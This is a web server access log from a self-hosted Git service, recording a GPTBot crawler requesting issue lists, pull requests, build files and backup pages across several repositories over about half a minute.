"/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:18:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10262] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10259] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10085] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" +[17/Feb/2026:18:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=all&type=all" +[17/Feb/2026:18:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" +[17/Feb/2026:18:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10131] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=all&type=all" +[17/Feb/2026:18:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:18:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:18:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11807] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:18:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11992] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:18:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" +[17/Feb/2026:18:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10142] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" +[17/Feb/2026:18:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10261] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:42:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/index.html" +[17/Feb/2026:18:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/index.html" +[17/Feb/2026:18:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11823] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 11172] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 12012] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10851] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9841] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11119] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 971] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" +[17/Feb/2026:18:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fsrc%2fcodec.cpp.o" [Client 74.7.227.38] [Length 24215] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:18:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 10640] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:18:42:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21827] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" +[17/Feb/2026:18:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr 